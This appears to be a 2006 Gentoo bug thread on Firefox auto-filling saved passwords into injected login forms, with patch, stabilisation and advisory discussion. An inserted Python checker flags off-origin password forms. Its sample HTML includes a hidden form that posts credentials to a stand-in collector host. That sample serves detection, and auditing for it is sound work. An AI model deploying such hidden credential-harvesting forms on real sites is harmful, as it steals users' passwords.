2.0 is still ~x86, but this is stupid enough and easily exploitable enough that it warrants a bug of its own. Also: http://www.info-svc.com/news/11-21-2006/
Firefox will automatically fill in site passwords for login forms that are not from the original site. Since the forms don't have to be visible, usernames and passwords can be discovered transparently to the user. It does require that the attacker have some way to inject user-created HTML with form tags into the trusted site, which is easily accomplished on sites such as MySpace where user-created HTML is the norm.
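Added example (not part of the bug report or of the upstream patch): a check that a site accepting user-created HTML could run to flag the situation described in comment #0, assuming the risky case is a form that holds a password field and submits to a different origin than the page hosting it. The function names, hostnames and sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) of an absolute URL, with default ports filled in."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

class PasswordFormAudit(HTMLParser):
    """Record the resolved action of every <form> that holds a password input."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.actions, self._form = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or empty action submits back to the page itself.
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "password": False}
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            if self._form["password"]:
                self.actions.append(self._form["action"])
            self._form = None

def off_origin_password_forms(page_url, html):
    """Actions of password forms that would submit to another origin."""
    audit = PasswordFormAudit(page_url)
    audit.feed(html)
    audit.close()
    audit.handle_endtag("form")  # flush a form left unterminated in the markup
    return [u for u in audit.actions if origin(u) != origin(page_url)]

# Constructed sample: a page on a site that allows user-created HTML. The first
# form is the site's own login; the second is hidden and posts to another host.
SAMPLE_PAGE = "https://social.example.test/profile/123"
SAMPLE_HTML = """
<form action="/login" method="post">
  <input type="text" name="user"><input type="password" name="pass">
</form>
<div style="display:none">
  <form action="https://collector.example.net/save" method="post">
    <input type="text" name="user"><input type="PASSWORD" name="pass">
  </form>
</div>
"""
```

The check covers static markup only; forms created or retargeted by script after page load need to be blocked by the sanitizer that strips script from user content.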
(In reply to comment #0)
> 2.0 is still ~x86, but this is stupid enough and easily exploitable enough that
> it warrants a bug of its own.
Also affects older versions, at least 1.7.0.8
I guess you mean 1.5.0.8. So I read, unconfirmed from my side, though ... (ranting censored)
Created attachment 103079
new patchset that includes a patch from upstream.
This is a new patchset with a patch from upstream; it is sane. I have changed the default to false, so users must now make the change to true if they wish to keep the current method of auto-filling usernames and passwords that are saved.
Mozilla-firefox-2.0-r2 is in the tree now with Jory's patch.
So this patch disables auto-filling of username/password fields (i.e., it turns the feature off, it doesn't replace the old vulnerable method with a new one)? And if we wanted to re-enable auto-fill, which option do we change from false to true in about:config?
(In reply to comment #5)
> And if we wanted to re-enable auto-fill, which option do we change from false
> to true in about:config?
>
simple change signon.autofillForums to true :)
*** Bug 157035 has been marked as a duplicate of this bug. ***
what about 1.5.x.x, is this branch unaffected? btw, it seems like we may not enable official branding with that patch ... lol
(In reply to comment #6)
> (In reply to comment #5)
> > And if we wanted to re-enable auto-fill, which option do we change from false
> > to true in about:config?
> >
> simple change signon.autofillForums to true :)
>
Perhaps there should be a way to enable it per-site. For example, sites that users can be explicitly allowed to autofill forms, but all the others are explicitly denied this right. Just a thought, seems like it would work to me, but IANAP.
MFSA 2006-75 RSS Feed-preview referrer leak
MFSA 2006-73 Mozilla SVG Processing Remote Code Execution
MFSA 2006-72 XSS by setting img.src to javascript: URI
MFSA 2006-71 LiveConnect crash finalizing JS objects
MFSA 2006-70 Privilege escalation using watch point
MFSA 2006-69 CSS cursor image buffer overflow (Windows only)
MFSA 2006-68 Crashes with evidence of memory corruption (rv:1.8.0.9/1.8.1.1)
Ebuilds are not in tree at the moment ... I am working on them and they will be available soon.
Wielding the handy "Add Arch's" button on behalf of Anarchy.
Target *stable* version 1.5.0.9
2.0.0.1 is on its way for ~arch.
actually adding arches - sorry for bugspam... *shrug*
mozilla-firefox-bin-1.5.0.9 done on AMD64.
www-client/mozilla-firefox-1.5.0.9 Stable for HPPA.
In x86, bin version: Emerges and works fine.
sparc stable.
any reason why AMD64 and HPPA were not removed from the Cc list ?
don't forget -bin
(In reply to comment #17)
> any reason why AMD64 and HPPA were not removed from the Cc list ?
Because the summary contradicts what you wanted stabilised.
www-client/mozilla-firefox-bin-1.5.0.9
1. emerges on x86
2. passes collision test
3. works
www-client/mozilla-firefox-1.5.0.9
1. emerges on x86, please note:
   unpack mozilla-firefox-1.5.0.9-de.xpi: file format not recognized. Ignoring.
   dodoc: LEGAL does not exist
2. passes collision test
3. works
ppc stable
x86 done.
This is ready for glsa ...
Removing amd64 from CC:
19 Dec 2006; <malc@gentoo.org> mozilla-firefox-1.5.0.9.ebuild:
Stable on amd64 wrt security bug #156023
rerating due to MFSA 2006-73 (at least)
sorry for the delay in the GLSA (Christmas holidays, it seems)
-----------------
Description
Appending an SVG comment DOM node from one document into another type of document such as HTML in some cases results in a crash due to memory corruption that can be exploited to run arbitrary code.
This flaw was introduced in the Firefox 1.5.0.4 release, prior versions are unaffected.
Mozilla would like to thank an anonymous researcher working with TippingPoint and the Zero Day Initiative for reporting this issue.
added CVE entry for the original bug.
The about:config section is now called signon.prefillForms in 2.0.0.1, in case anybody reading this bug couldn't find it now.
http://www.gentoo.org/security/en/glsa/glsa-200701-02.xml
http://www.gentoo.org/security/en/glsa/glsa-200701-03.xml
http://www.gentoo.org/security/en/glsa/glsa-200701-04.xml
Thank you and goodnight!
arm/ia64 won't stabilize 1.5.